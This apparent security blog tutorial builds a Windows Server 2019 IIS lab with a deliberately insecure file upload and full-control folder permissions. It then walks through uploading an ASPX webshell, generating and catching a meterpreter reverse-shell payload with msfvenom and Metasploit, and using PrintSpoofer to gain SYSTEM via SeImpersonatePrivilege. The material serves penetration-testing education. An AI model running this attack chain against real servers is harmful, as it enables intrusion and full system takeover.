Privilege Escalation

Windows Privilege Escalation: SeImpersonatePrivilege

In this article on Windows Privilege Escalation SeImpersonatePrivilege, we will be showcasing the process of creating a lab environment on an IIS Server running a Windows Server 2019 machine. After setting the IIS server, we will be focusing on the usage of the SeImpersontePrivilege or “Impersonate a Client After Authentication” User Right Privileges to elevate the access on the machine using different methods.

Table of Contents

  • Introduction
  • Lab Setup
    • IIS Installation
    • Adding the Upload Functionality
    • Changing Permissions
  • Exploitation of IIS Server
  • Elevating Privileges using PrintSpoofer
  • Conclusion

Introduction

Talking about the SeImpersonatePrivilege (Impersonate a Client after Authentication), Microsoft introduced it in Windows 2000 SP4. The system assigns this privilege to users who are members of the Device’s Local Administrators Group and the Device’s Local Service Account. Moreover, apart from these users and groups, the following components also have this user right: Services initiated by the Service Control Manager and Component Object Model (COM) servers initiated by the COM infrastructure. Now that we know which types of users have the SeImpersonatePrivilege, it’s time to understand what users gain with these privileges. Whenever a user receives the SeImpersonatePrivilege, they are permitted to run programs on behalf of a client, thereby supporting Windows Privilege Escalation SeImpersonatePrivilege scenarios.

Now that we have a certain understanding of the SeImpersontatePrivilege. Let’s dive into the Lab setup for now. We will discuss this as we proceed.

Lab Setup

As we learned from the Introduction that this kind of privilege is set on the users that are local administrators or have similar roles. So, to replicate the vulnerability, we will be using Window Server 2019 with AD.  As Microsoft patched the vulnerabilities, we will be using Build 17763 as shown in the image below.

systeminfo

IIS Installation

We will be getting the particular privilege by installing the IIS server on our machine. To configure the IIS server, we will need to open the Server Manager and Choose the Add roles and features from the QuickStart Menu as shown in the image below.

This will open an Installation Wizard. We move through the Before You Begin section without making any changes. Now we are presented with the Installation Type section, we will proceed to choose the Role-based or feature-based installation option.  

Again, we are breezing through the Server Selection as this would be different for each user as it is based on the name you gave to your server and its subsequent Forest. We get to the Server Roles section. Here, we have the option to choose the Web Server (IIS) as demonstrated below.

Configuring IIS Features and Completing Installation

Pressing the next button will lead us to the Features Section. Here, we have to make sure that we have some dependencies that are required for the IIS to function properly. It includes .NET Framework 4.7; chances are it will be installed by default. But other than that we need to install the ASP .NET 4.7 and under the WCF Services, we have the HTTP Activation and the TCP Port Sharing. Again, if you have something that is already installed, it is fine to move on by clicking Next.

Now, we have the section that has the Role-based Services that we want to install. There will be some automatically selected apart from those we will be selecting the Web Server and its components containing the Common HTTP Features, Health and Diagnostics, Performance and Security components as shown in the image below.

At last, we have the Confirmation Section. Here, we can verify all the services and components that we want to install. You can move on to the installation by clicking the Install button.

The Installation process will run for a little bit and then you would have successfully installed the IIS Service. We can view the IIS Welcome Page by accessing the IP Address of the Server through a Web Browser of your choice. In case, you run into an issue, try restarting the IIS service or the Server Itself.  

Adding the Upload Functionality

Similar to the /var/www/html from the Linux HTTP server, we have the equivalent inside the inetpub/wwwroot location. It will have the welcome page that we viewed on the Web Browser Earlier. At this stage, we want to add the Upload Functionality onto our IIS Server. To do this, we created some web pages and scripts. We won’t be explaining those in detail over here. But, in case you want to add those on your deployment, download the files from our GitHub Repository and Extract those files inside the wwwroot directory in such a way that it replicates the image shown below.

To access the CS.aspx on our ISS Server, we will be editing the iisstart HTML page. Upon opening the file, the first time, you will be looking at some comments and the Official Microsoft Links. We removed those data and added the static address of our server followed by the name of the aspx file. This will make our CS.aspx webpage accessible when we click on the Welcome Page that used to redirect to the Microsoft Home Page. We are doing this to make our application easily accessible.

Changing Permissions

The process of adding web pages with the Upload functionality doesn’t end here, we need to change the permission so that we can access the webpage and upload files. To change the permissions, we open the IIS Manager. Here on the right-hand side Menu, we have the Edit Permissions option as highlighted in the image.

This will open the wwwroot Directory Permissions. Here, we are allowing the Users of the Domain Full Control with the Modify access of the wwwroot directory. However, there exists a more secure way of doing this by making a dedicated user for the management of the IIS Server and adding the restricted permissions for that particular user. However, in the interest of time and convenience, we are applying permission for all users.

Exploiting IIS Server

Now that we have the IIS Server up and running. Although we must mention that in case your IIS Server is not working as expected, try restarting the IIS service or the Server itself. Moving on, to exploit the IIS Server, we have added the File Upload functionality. Moving onto our attacker machine i.e., Kali Machine. Here, we have the Kali machine also set up in the network in such a way that it is possible to access the IIS service through a Web Browser on Kali. We browse the File Upload functionality and upload ASP Command Shell that is located at /usr/share/webshells/aspx/cmdasp.aspx on the webpage as shown in the image below.

Clicking on the Upload button, we will have the file successfully uploaded. This is just a demonstration; real-life scenarios will have additional security and steps involved before uploading a shell.

As per the programming of the files that provided the Upload functionality, it was managed that the uploaded files will be placed inside the Uploads directory. So, we can access the uploaded shell by browsing at /Uploads/cmdasp.aspx as shown in the image. Here we have a field that can be used to run commands on the target machine. We demonstrated this by running the net user command.

Gaining Meterpreter Shell and Enumerating Privileges

Now that we have tested that we can upload a shell and execute commands, it’s time to exploit the system and gain a meterpreter on the target machine. This means that we will need to create a payload using the msfvenom or any other tool of your choice. We are naming our payload as shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -f exe > shell.exe

After successfully creating the payload, we will upload the payload similarly as we did with the aspx shell earlier.  We can see that the executable payload has been successfully uploaded to the target machine.

Now to generate the meterpreter shell, we will need to execute the payload as well. Hence, we will use the aspx shell to browse the path of the uploaded executable shell.exe file as shown in the image below.

Before Executing the payload, we will need to create a listener that will capture the meterpreter reverse shell generated from the payload. We will need to provide the same configurations that we used while crafting the payload using the msfvenom. Next, we will exploit the payload on the machine using the aspx shell and receive the meterpreter shell. Since we are focusing on the Privileges in this piece, we ran the getprivs command to get the privileges that are enabled on the target machine. We can see that the privilege in question is enabled on the target machine i.e., SeImpersontatePrivilege.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 1234
exploit
getprivs

Although you don’t need to rely on the Metepreter shell’s getprivs command. You can check for the enabled privilege can be checked with the help of the whoami command with the /priv option added to it as shown in the image below. We can see that the session that we gained through exploitation is for the user iisapppool.

shell
whoami /priv
whoami

Elevating Privileges using PrintSpoofer

One of the key resources abused in the wild to exploit the privilege we are discussing is called PrintSpoofer. You can get your hands on the source code and the ready-to-deploy executable from GitHub.  Interestingly, this tool is relatively new; however, the technique it uses to elevate access is quite aged. To fully understand how this tool exploits the SeImpersonatePrivilege, we will now dive deeper into the access that this Windows Privilege Escalation SeImpersonatePrivilege provides.

As we discussed in the introduction, this privilege allows users to create a process with another user’s access. Therefore, PrintSpoofer exploits it to elevate access to the NT Authority level. In the demonstration provided below, we first move into the Public directory because it has the required write permissions for uploading the PrintSpoofer executable. Then, after uploading the executable, we move to the command shell on the target machine. After listing the contents, we can confirm that the transfer of the PrintSpoofer executable was successful.

Using the PrintSpoofer exploit is quite straightforward. You need two parameters: -i to request an interactive session and -c to specify the access level after exploitation. When we run this command on the target machine, it searches for the SeImpersonatePrivilege and checks for a Named Pipe. After successfully completing these checks, it proceeds with the creation of the process specified by the -c option using the NT Authority token. Finally, we observe that a new command shell instance is generated. When we run the whoami command, it shows that we have successfully achieved Windows Privilege Escalation SeImpersonatePrivilege.

PrintSpoofer64.exe -i -c cmd
whoami

Conclusion

During the research process, it became apparent that although many guides exist to use various tools to exploit the SeImpersonatePrivilege on the machine, there isn’t a single resource that shows how to set these privileges in the first place. Therefore, I hope that this article will help you grasp the concept of Windows Privilege Escalation using SeImpersonatePrivilege. It will also explain the methodology behind the exploitation of SeImpersonatePrivilege.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on LinkedIn